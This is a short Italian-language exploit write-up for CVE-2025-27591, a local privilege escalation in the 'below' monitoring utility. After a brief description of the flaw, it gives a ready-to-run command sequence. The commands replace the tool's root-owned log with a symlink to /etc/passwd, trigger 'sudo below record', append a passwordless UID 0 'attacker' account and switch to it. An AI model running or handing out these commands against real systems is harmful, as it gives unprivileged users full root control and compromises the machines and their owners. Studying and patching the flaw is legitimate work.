
Elevazione dei privilegi locale per CVE-2025-27591, che sfrutta la gestione non sicura dei symlink nella registrazione (logging) dell'utility sottostante per sovrascrivere file arbitrari come root.
CVE-2025-27591 è una vulnerabilità di escalation locale dei privilegi nell'utility below (versioni precedenti alla release corretta) causata da gestione non sicura dei link simbolici all'interno del suo meccanismo di logging. Gli attaccanti con accesso locale possono sfruttare questa falla per sovrascrivere file arbitrari come utente root, portando a una completa escalation dei privilegi.
Lo strumento below scrive i log in /var/log/below/ senza validare correttamente i link simbolici. Pre-creando un symlink che punta a un file sensibile (ad es. /etc/passwd), un attaccante può iniettare contenuto arbitrario con privilegi elevati quando il processo vulnerabile viene eseguito tramite sudo.
# Verifica se la directory dei log esiste
test -d /var/log/below && ls -ld /var/log/below
# Rimuovi il file di log esistente e crea un symlink malevolo
rm -f /var/log/below/error_root.log
ln -s /etc/passwd /var/log/below/error_root.log
# Prepara una voce passwd malevola
echo 'attacker::0:0:attacker:/root:/bin/bash' > /tmp/attacker
# Attiva il comportamento vulnerabile tramite sudo
sudo /usr/bin/below record
echo 'attacker::0:0:attacker:/root:/bin/bash' >> /var/log/below/error_root.log
# Passa al nuovo utente con privilegi root
su attacker
Lo sfruttamento riuscito concede privilegi root a un attaccante locale non privilegiato, consentendo il pieno compromesso del sistema.
/var/log/below/.